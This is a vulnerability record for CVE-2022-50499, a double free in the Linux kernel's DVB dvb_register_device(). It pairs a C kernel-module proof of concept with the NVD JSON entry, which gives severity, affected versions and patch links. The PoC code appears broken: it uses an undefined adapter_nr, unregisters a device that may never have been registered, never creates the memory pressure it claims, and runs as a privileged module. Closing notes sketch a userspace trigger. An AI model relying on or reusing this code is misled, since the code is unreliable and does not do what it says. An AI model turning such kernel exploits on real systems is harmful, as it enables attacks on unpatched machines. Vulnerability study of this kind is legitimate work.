CVE-2022-50499

/* * CVE-2022-50499 PoC - Linux Kernel DVB Double Free * This PoC demonstrates triggering the double-free vulnerability * in dvb_register_device() by exhausting memory to cause pad allocation failure. * * Note: This requires kernel module compilation and root or CAP_NET_ADMIN privileges * to interact with DVB subsystem, or specific local access conditions. */ #include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> #include <linux/slab.h> #include <media/dvbdev.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("Security Research"); MODULE_DESCRIPTION("CVE-2022-50499 PoC"); static int __init cve_2022_50499_init(void) { struct dvb_adapter *dvb_adapter; struct dvb_device *dvbdev; int ret; printk(KERN_INFO "CVE-2022-50499: Triggering DVB double-free vulnerability\n"); /* Allocate a DVB adapter */ dvb_adapter = kzalloc(sizeof(struct dvb_adapter), GFP_KERNEL); if (!dvb_adapter) return -ENOMEM; /* Initialize the adapter */ ret = dvb_register_adapter(dvb_adapter, "PoC Adapter", THIS_MODULE, NULL, adapter_nr); if (ret < 0) { kfree(dvb_adapter); return ret; } /* * Trigger the vulnerability by attempting to register a DVB device * under memory pressure conditions that cause dvbdev->pad allocation * to fail in dvb_create_media_entity(). * * The double-free occurs when: * 1. dvb_create_media_entity() allocates dvb->entity * 2. dvbdev->pad allocation fails * 3. dvb->entity is freed but NOT set to NULL * 4. dvb_media_device_free() is called and frees dvb->entity again */ /* Force memory pressure to trigger allocation failure */ /* In real exploit, consume memory to make kmalloc fail */ ret = dvb_register_device(dvb_adapter, &dvbdev, NULL, NULL, DVB_DEVICE_DEMUX, NULL); /* Cleanup */ dvb_unregister_device(dvbdev); dvb_unregister_adapter(dvb_adapter); kfree(dvb_adapter); return ret; } static void __exit cve_2022_50499_exit(void) { printk(KERN_INFO "CVE-2022-50499: Module unloaded\n"); } module_init(cve_2022_50499_init); module_exit(cve_2022_50499_exit); /* * Alternative userspace trigger approach: * - Use /dev/dvb/adapterX devices with specific ioctl calls * - Manipulate memory allocation through ulimit or cgroup controls * - The key is to cause dvb_create_media_entity() to fail at pad allocation * while dvb->entity has already been allocated */

{"cve": {"id": "CVE-2022-50499", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:47.027", "lastModified": "2026-01-22T19:57:00.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-core: Fix double free in dvb_register_device()\n\nIn function dvb_register_device() -> dvb_register_media_device() ->\ndvb_create_media_entity(), dvb->entity is allocated and initialized. If\nthe initialization fails, it frees the dvb->entity, and return an error\ncode. The caller takes the error code and handles the error by calling\ndvb_media_device_free(), which unregisters the entity and frees the\nfield again if it is not NULL. As dvb->entity may not NULLed in\ndvb_create_media_entity() when the allocation of dvbdev->pad fails, a\ndouble free may occur. This may also cause an Use After free in\nmedia_device_unregister_entity().\n\nFix this by storing NULL to dvb->entity when it is freed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.9.195", "versionEndExcluding": "4.9.337", "matchCriteriaId": "A9B84AB7-4AC3-4105-B7B4-C7179BF6FEA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.14.147", "versionEndExcluding": "4.14.303", "matchCriteriaId": "55F1C74B-508B-40EF-AA92-BDBB8B358084"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.19.77", "versionEndExcluding": "4.19.270", "matchCriteriaId": "070E4E28-82B9-413D-9C76-A5AF17B49161"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.19", "versionEndExcluding": "5.3", "matchCriteriaId": "48875F15-B129-4684-8556-4EAD32A9586F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.4", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A075CE1B-9AD1-4DE5-8D34-58F33ED44819"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.87", "matchCriteriaId": "7B9E5B1C-CD46-4790-9500-615863850401"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.18", "matchCriteriaId": "08D38C5F-9644-4549-BBA6-F0860F024D14"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.4", "matchCriteriaId": "BC4189D9-5478-4E88-A78D-9C1DE29B217C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0588b12c418c3e4f927ced11f27b02ef4a5bfb07", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/123eddf92a114e03919942641d2c2b1f4ca56ea6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6b0d0477fce747d4137aa65856318b55fba72198", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/70bc51303871159796b55ba1a8f16637b46c2511", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/772892b29ac50c2c5e918fc80104aa6ede81d837", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7dd5a68cdbbbe7fc67ba701cb52ba10d8ba149f8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/acf984a3718c2458eb9e08b6714490a04f213c58", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b21f62b49ee9c3e0216d685d9cfd6003e5727271", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e9a78485b658361fab6a5547377be6c1af6f1b3d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ... (truncated)